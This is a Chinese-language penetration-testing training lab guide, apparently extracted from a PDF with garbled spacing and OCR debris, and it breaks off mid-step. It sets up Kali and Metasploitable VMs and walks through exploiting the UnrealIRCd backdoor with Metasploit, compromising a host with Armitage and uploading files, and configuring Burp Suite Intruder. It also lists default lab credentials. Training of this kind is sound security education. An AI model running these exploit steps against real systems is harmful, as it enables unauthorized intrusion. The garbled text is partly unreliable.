NAT网络仅主机(Host-Only)网络(助语活动名称叼NatNetworkO网络安全与渗透测试训练营》试验指导实验环境要求1,Windows操作系统,推荐Windows732位或者64位2,至少有32GB空闲磁盘空间实验网络搭建方式1(NAT网络)1,安装VirtualBox虚拟机管理软件2,启动VirtualBox的虚拟机管理器,点击“管理>全局设定…”调出如下对话框,选择“网络>NAT网络”页,如果列表为空,则点击右侧的+号图标,让列表中至少存在一个虚拟网络。古VirtualBox-全局设”常规网络显示网貉B扩展L代理Cancel3,点击“管理>导入虚拟机...”,选择实验材料中的meta.ova文件,导入虚拟机。再选择kali2016.ova导入Kali虚拟机。4,导入成功后,选择Meta虚拟机,点击设置按钮,切换到网络页面,将网络选项改为下图所示的Hostonly方式,并选择上面创建的虚拟网卡。1.5,选择Kali2016虚拟机,重复上面一步设置网路。实验网络搭建方式2(Host-Only网络)安装VirtualBox虚拟机管理软件启动VirtualBox的虚拟机管理器,点击“管理>全局设定…”调出如下对话框,选择3.点击“管理>导入虚拟机…”,选择实验材料中的meta.ova文件,导入虚拟机。再选择kali2016.ova导入Kali虚拟机。“网络>Hostonly”页,然后点击右侧的+号图标,让列表中至少存在一个虚拟网卡。4.导入成功后,选择Meta虚拟机,点击设置按钮,切换到网络页面,将网络选项改为下图所示的Hostonly方式,并选择上面创建的虚拟网卡。5.选择Kali2016虚拟机,重复上面一步。试验1理解MSF工作过程1,启动Kali2016虚拟机和Meta虚拟机2,在Meta虚拟机中用msfadmin/msfadmin登陆执行ifconfig,观察和记录IP地址3,在Kali虚拟机中使用如下用户名和密码登陆:用户名:root密码:advdbg6,在Kali虚拟机执行msfconsole启动MSF控制台7,在MSF控制台中执行如下命令:msf>useexploit/unix/irc/unreal_ircd_3281_backdoormsfexploit(unreal_ircd_3281_backdoor)>setRHOST<第2步看到的IP地址>msfexploit(unreal_ircd_3281_backdoor)>exploit8,等待exploit命令执行成功后,在简单shell中,尝试执行linux命令:>ls>ps>echo“Yourmachineisminenow”>/var/www/abc.txt9,在Meta虚拟机中执行如下命令观察上面产生的文件:#ls/var/www#cat/var/www/abc.txt#sudo/var/www/abc.txt10,不必关闭虚拟机,下一个试验还需要。试验2:使用Armitage颠覆Linux服务器1,在Kali桌面的左侧工具条上点击Armitage的图标启动Armitage2,当下面的连接对话框出现后,保持所有默认内容,点击Connect按钮,让其与MSF后台服务进程自动建立连接。3,如果出现下面的询问是否启动MSF的对话框,则点击Yes让Armitage自动启动MSF后台服务。4,如果出现下面的对话框,表示启动MSF时链接数据库失败。解决的方法是安装提示,开启一个终端窗口(工具栏上有按钮),在其中执行servicepostgresqlstart,然后再重新启动Armitage。5,Armitage的主界面出现后,选择"Hosts>AddHost...”调出增加主机对话框,输入Meta虚拟机的IP地址,然后点击确定后,Armitage的主机列表区域应该出现一个下新的图标。右击该图标,在右键菜单中选择Host>SetLabel,给其设定个名字,叫Meta。6,选中Meta主机,然后在Armitage的主菜单中选择Attacks>FindAttack发起漏洞扫描。7,等待扫描完成后,右键点击Meta主机图标,调出快捷菜单,选择Attack>ire>8,观察Armitage执行攻击脚本的过程,等待其结束,如果出现如下界面,则表示成功颠覆了目标主机。9,右键点击Meta主机图标,选择Shell1>Upload…选取一个本地文件后,Armitage会将其上传到被颠覆的主机。10,右键点击Meta主机图标,选择Shell1>Interact,然后在shell窗口中执行常用的Linux命令。11,关闭Armitage结束本实验。试验3:使用BurpSuite的Intruder功能1,启动Kali2016虚拟机,在左侧的工具条上点击BurpSuite(以下简称Burp)的图标,启动Burp。选择默认选项,进入Burp主界面。2,点击Proxy>Intercept,确认代理功能的拦截选项是打开的,即如下图所示Interceptison.调出Firefox的管理页面,选择Advanced>Network>Settings调出下图所示的ConnectionSettings对话框,然后按照下图内容设置启用代...
